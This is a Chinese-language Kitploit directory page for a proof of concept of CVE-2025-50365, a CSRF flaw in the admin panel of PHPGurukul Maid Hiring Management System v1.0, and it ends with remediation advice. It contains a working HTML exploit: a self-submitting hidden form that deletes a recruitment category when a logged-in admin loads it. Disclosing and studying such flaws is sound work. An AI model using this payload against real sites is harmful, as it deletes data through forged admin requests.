Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — CVE-2025-50365 的 PoC:PHPGurukul Maid Hiring Management System 中的 CSRF 漏洞,允许通过精心构造的管理员请求删除招聘类别。 | Kitploit
工具/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

CVE-2025-50365 的 PoC:PHPGurukul Maid Hiring Management System 中的 CSRF 漏洞,允许通过精心构造的管理员请求删除招聘类别。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
31年前尚未审核
分享

项目名称与仓库URL: 使用PHP和MySQL的家政招聘管理系统

漏洞类型: 客户端请求伪造

受影响版本: v1.0

💣漏洞描述: PHPGurukul 家政招聘管理系统的管理面板中存在跨站请求伪造(CSRF)漏洞,攻击者可通过诱骗已认证的管理员访问恶意网站,从而删除任意招聘分类。这可能导致数据被删除及未授权的管理员级别更改。

👩‍💻影响: 未授权的分类删除。

🛜漏洞验证(PoC):

  1. 存在一个分类删除功能,仅已认证的管理员可以删除分类。 1

  2. 用于向端点 /admin/manage-category.php 发送 GET 请求的 HTML 代码。 CSRF-POC

    root@kitploit:~
    <html>
      <body>
        <form action="http://127.0.0.1/mhms/admin/manage-category.php">
          <input type="hidden" name="delid" value="13" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
  3. 使用上述 HTML 代码构造恶意 URL。 3

  4. 管理员点击链接后,分类将被删除。 4 5

建议: 在管理表单中实施 CSRF 令牌,强制使用 SameSite Cookie,并验证请求来源以防止未授权操作。

下载工具